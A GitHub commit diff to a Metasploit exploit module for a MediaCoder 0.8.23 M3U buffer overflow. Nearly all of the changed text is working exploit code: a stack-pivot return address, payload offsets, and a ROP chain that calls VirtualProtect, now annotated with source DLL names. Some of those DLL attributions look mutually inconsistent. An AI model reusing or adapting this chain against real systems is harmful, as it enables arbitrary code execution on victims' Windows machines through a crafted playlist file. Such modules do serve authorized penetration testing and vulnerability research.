Skip to content

Commit b2a18c3

Browse files
committed
add dll references for rop
1 parent ed6d88a commit b2a18c3

File tree

1 file changed

+22
-22
lines changed

1 file changed

+22
-22
lines changed

modules/exploits/windows/fileformat/mediacoder_m3u.rb

Lines changed: 22 additions & 22 deletions
Original file line numberDiff line numberDiff line change
@@ -26,7 +26,7 @@ def initialize(info = {})
2626
'Author' =>
2727
[
2828
'metacom', # Vulnerability discovery and PoC
29-
'modpr0be <modpr0be[at]spentera.com>' # Metasploit module
29+
'modpr0be <modpr0be[at]spentera.com>', # Metasploit module
3030
'otoy <otoy[at]spentera.com>' # Metasploit module
3131
],
3232
'References' =>
@@ -50,7 +50,7 @@ def initialize(info = {})
5050
[
5151
[ 'MediaCoder 0.8.23.5530 / Windows XP SP3 / Windows 7 SP1',
5252
{
53-
'Ret' => 0x6afd4435, # stack pivot (add esp,7ac;pop pop pop pop ret)
53+
'Ret' => 0x6afd4435, # stack pivot (add esp,7ac;pop pop pop pop ret from postproc-52.dll)
5454
'Offset' => 849,
5555
'Max' => 5000
5656
}
@@ -80,33 +80,33 @@ def exploit
8080
rop_gadgets =
8181
[
8282
nops(true,35), # ROP NOP
83-
0x100482ff, # POP EAX # POP EBP # RETN
83+
0x100482ff, # POP EAX # POP EBP # RETN [jpeg.dll]
8484
0xffffffc0, # negate will become 0x00000040
8585
junk,
86-
0x66d9d9ba, # NEG EAX # RETN
87-
0x6ab2241d, # XCHG EAX,EDX # ADD ESP,2C # POP EBP # POP EDI # POP ESI # POP EBX # RETN
86+
0x66d9d9ba, # NEG EAX # RETN [avutil-52.dll]
87+
0x6ab2241d, # XCHG EAX,EDX # ADD ESP,2C # POP EBP # POP EDI # POP ESI # POP EBX # RETN [swscale-2.dll]
8888
junk(15), # reserve more junk for add esp,2c
89-
0x1004a8ee, # POP ECX # RETN
90-
0x6ab561b0, # ptr to &VirtualProtect()
91-
0x66d9feee, # MOV EAX,DWORD PTR DS:[ECX] # RETN
92-
0x6ab19780, # XCHG EAX,ESI # RETN
93-
0x66d929f5, # POP EAX # POP EBX # RETN
89+
0x1004cc03, # POP ECX # RETN [jpeg.dll]
90+
0x6ab561b0, # ptr to &VirtualProtect() [IAT swscale-2.dll]
91+
0x66d9feee, # MOV EAX,DWORD PTR DS:[ECX] # RETN [avutil-52.dll]
92+
0x6ab19780, # XCHG EAX,ESI # RETN [swscale-2.dll]
93+
0x66d929f5, # POP EAX # POP EBX # RETN [jpeg.dll]
9494
0xfffffcc0, # negate will become 0x0000033f
9595
junk,
96-
0x6ab3c65a, # NEG EAX # RETN
97-
0x1004cc03, # POP ECX # RETN
96+
0x6ab3c65a, # NEG EAX # RETN [postproc-52.dll]
97+
0x1004cc03, # POP ECX # RETN [jpeg.dll]
9898
0xffffffff, #
99-
0x660166e9, # INC ECX # SUB AL,0EB # RETN
100-
0x66d8ae48, # XCHG ECX,EBX # RETN
101-
0x1005f6e4, # ADD EBX,EAX # OR EAX,3000000 # RETN
102-
0x6ab3d688, # POP ECX # RETN
103-
0x6ab4ead0, # Writable address
104-
0x100444e3, # POP EDI # RETN
105-
nops(true), # ROP NOP
106-
0x10048377, # POP EAX # POP EBP # RETN
99+
0x660166e9, # INC ECX # SUB AL,0EB # RETN [libiconv-2.dll]
100+
0x66d8ae48, # XCHG ECX,EBX # RETN [avutil-52.dll]
101+
0x1005f6e4, # ADD EBX,EAX # OR EAX,3000000 # RETN [jpeg.dll]
102+
0x6ab3d688, # POP ECX # RETN [jpeg.dll]
103+
0x6ab4ead0, # Writable address [avutil-52.dll]
104+
0x100444e3, # POP EDI # RETN [swscale-2.dll]
105+
nops(true), # ROP NOP [swscale-2.dll]
106+
0x100482ff, # POP EAX # POP EBP # RETN [jpeg.dll]
107107
nops, # Regular NOPs
108-
0x6ab01c06, # PUSH ESP# RETN
109-
0x6ab28dda, # PUSHAD # RETN
108+
0x6ab01c06, # PUSH ESP# RETN [swscale-2.dll]
109+
0x6ab28dda, # PUSHAD # RETN [swscale-2.dll]
110110
].flatten.pack("V*")
111111

112112
sploit = "http://"

0 commit comments

Comments
 (0)